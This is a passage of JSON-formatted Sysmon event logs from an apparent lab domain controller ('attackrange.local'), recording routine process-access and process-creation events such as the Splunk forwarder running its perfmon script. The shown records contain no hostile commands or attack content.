{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3984,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3985,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3986,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3987,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.654\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00103A5E0500}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.654","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00103A5E0500}","TargetProcessId":"4384","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3988,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.765\r\nProcessGuid: {E2A3D6B1-1107-5F25-0000-001021C00500}\r\nProcessId: 872\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.765","ProcessGuid":"{E2A3D6B1-1107-5F25-0000-001021C00500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\perfmon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3989,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001021C00500}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001021C00500}","TargetProcessId":"872","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3990,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001021C00500}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001021C00500}","TargetProcessId":"872","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3991,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.764","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3992,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.764\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 